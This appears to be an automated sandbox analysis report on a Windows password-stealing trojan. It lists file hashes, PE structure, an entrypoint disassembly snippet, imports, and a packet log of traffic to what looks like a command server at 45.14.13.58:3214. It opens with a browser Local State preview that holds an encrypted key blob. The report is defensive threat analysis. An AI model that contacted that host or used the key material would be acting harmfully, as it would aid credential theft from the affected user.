Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.370637877339755
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File size:	219136
MD5:	a6602f490e70a0c9846906944c01b1ba
SHA1:	3864724e9136d3090cd2e7afa5ae4a348e07e0e4
SHA256:	1733a30d0e7acb953730092047086555a39f5cb2ee2549021e253cbdc931fb91
SHA512:	f7648d06aa40af9a09f6c62613289a9c2a633652c8f61412de3f9de096a0bcc7dbc930a8a3a6d7dc64116fbbb24d7552e7ed0ede48fda9ebfb01765b0c19a27d
SSDEEP:	3072:2DKW1LgppLRHMY0TBfJvjcTp5X1aRIPZJxxJXa6sQ8ksg4oNWfl:2DKW1Lgbdl0TBBvjc/OWA4Vsg4td
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................d,.....PE..L...t..P..........#........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40cd2f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	bf5a4aa99e5b160f8521cadd6bfe73b8

Entrypoint Preview

Instruction
call 00007F1D409C4256h
jmp 00007F1D409BE419h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0041F058h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F1D409BE57Eh
test byte ptr [eax], 00000008h
je 00007F1D409BE579h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0041B000h]
leave
retn 0008h
ret
mov eax, 00413563h
mov dword ptr [004228E4h], eax
mov dword ptr [004228E8h], 00412C4Ah
mov dword ptr [004228ECh], 00412BFEh
mov dword ptr [004228F0h], 00412C37h
mov dword ptr [004228F4h], 00412BA0h
mov dword ptr [004228F8h], eax
mov dword ptr [004228FCh], 004134DBh
mov dword ptr [00422900h], 00412BBCh
mov dword ptr [00422904h], 00412B1Eh
mov dword ptr [00422908h], 00412AABh
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007F1D409BE50Bh
call 00007F1D409C4D90h
cmp dword ptr [ebp+00h], 00000000h

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x215b4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26000	0x13660	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1b1c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x20da0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1b000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x19718	0x19800	False	0.578957950368	data	6.74860454531	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1b000	0x6db4	0x6e00	False	0.546732954545	data	6.44295624763	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x22000	0x30c0	0x1600	False	0.312677556818	data	3.2625868398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x26000	0x13660	0x13800	False	0.988744491186	data	7.9910249633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_RCDATA	0x26124	0x130e4	data
RT_RCDATA	0x39208	0x20	data
RT_VERSION	0x39228	0x24c	data
RT_MANIFEST	0x39474	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
KERNEL32.dll	RaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
ole32.dll	OleInitialize
OLEAUT32.dll	SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	0.0.0.0
InternalName	Cloisters.exe
FileVersion	0.0.0.0
ProductVersion	0.0.0.0
FileDescription
OriginalFilename	Cloisters.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 17:48:08.579906940 CET	49718	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:08.635679007 CET	3214	49718	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:08.635891914 CET	49718	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:08.775664091 CET	49718	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:08.829349041 CET	3214	49718	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:08.830141068 CET	49718	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:08.885245085 CET	3214	49718	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:08.885293007 CET	3214	49718	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:08.885310888 CET	3214	49718	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:08.885499001 CET	49718	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:12.442255020 CET	49723	43	192.168.2.3	192.0.47.59
Feb 23, 2021 17:48:12.566804886 CET	43	49723	192.0.47.59	192.168.2.3
Feb 23, 2021 17:48:12.566910028 CET	49723	43	192.168.2.3	192.0.47.59
Feb 23, 2021 17:48:12.568711996 CET	49723	43	192.168.2.3	192.0.47.59
Feb 23, 2021 17:48:12.693542004 CET	43	49723	192.0.47.59	192.168.2.3
Feb 23, 2021 17:48:12.696238041 CET	43	49723	192.0.47.59	192.168.2.3
Feb 23, 2021 17:48:12.696259975 CET	43	49723	192.0.47.59	192.168.2.3
Feb 23, 2021 17:48:12.696392059 CET	49723	43	192.168.2.3	192.0.47.59
Feb 23, 2021 17:48:13.539527893 CET	49723	43	192.168.2.3	192.0.47.59
Feb 23, 2021 17:48:16.511305094 CET	49718	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.518768072 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.563900948 CET	3214	49718	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.564021111 CET	49718	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.571393013 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.571475029 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.793100119 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.846759081 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.849160910 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.901778936 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.901817083 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.901842117 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.901869059 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.901959896 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.902014971 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.902034044 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.954483032 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.954515934 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.954689026 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.954695940 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.954773903 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.954840899 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.954865932 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.954886913 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.954932928 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.954941034 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.954957008 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.954992056 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:16.955008030 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.955039978 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:16.955070972 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.011455059 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.011499882 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.011527061 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.011734962 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.011862993 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.013767004 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.013798952 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.013823032 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.064883947 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065087080 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.065155029 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065186977 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065216064 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065246105 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065429926 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.065464973 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065495014 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065520048 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065526009 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.065548897 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.065597057 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.065620899 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.065673113 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065748930 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065778971 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065814018 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.065875053 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.065890074 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.065908909 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066056013 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066075087 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066149950 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066236973 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066348076 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066373110 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066397905 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066425085 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066462040 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066556931 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066559076 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066627979 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066627979 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066696882 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066765070 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066772938 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066876888 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.066885948 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.066979885 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.067049026 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.067157984 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.067171097 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.067198992 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.067250967 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.067267895 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.067267895 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.067383051 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.118061066 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.118108034 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.118134022 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.118160009 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.118185043 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.118240118 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.118314028 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.118354082 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.118382931 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.118398905 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.118410110 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.118719101 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.118829966 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.118855000 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119067907 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119096041 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119203091 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119431973 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119791985 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119818926 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119843006 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119947910 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.119976044 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.119982958 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120090961 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120117903 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120193958 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120223999 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120243073 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.120291948 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120326996 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120338917 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.120389938 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.120733023 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120763063 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120788097 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.120894909 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.121243000 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.121341944 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.121368885 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.121489048 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.121510029 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.121515036 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.121716976 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.121767044 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.121885061 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.121952057 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.122064114 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.122129917 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.122138977 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.122296095 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.122334957 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.122441053 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.170830965 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.170881987 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.170908928 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.170938015 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.171049118 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.171097040 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.172171116 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.172247887 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.172609091 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.172641039 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.172698975 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.172760010 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.173067093 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.173095942 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.173146963 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.173163891 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.173207045 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.173264027 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.173605919 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.173661947 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.173716068 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.173743010 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.173794985 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.173862934 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.173974037 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.174026012 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.174169064 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.174199104 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.174261093 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.174809933 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.174840927 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.174916983 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.174942017 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.174945116 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.174990892 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.174999952 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.175064087 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.175143003 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.175467968 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.175576925 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.175668955 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.175731897 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.175761938 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.175834894 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.175858021 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.175925970 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.175952911 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.175992012 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.176009893 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.176027060 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.176088095 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.176101923 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.176171064 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.176256895 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.176281929 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.176480055 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.176563978 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.223567009 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.223608971 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.223632097 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.223736048 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.223819971 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.223886013 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.224574089 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.224598885 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.224705935 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.225028038 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.225208998 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.225306034 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.225442886 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.225466967 CET	3214	49726	45.14.13.58	192.168.2.3
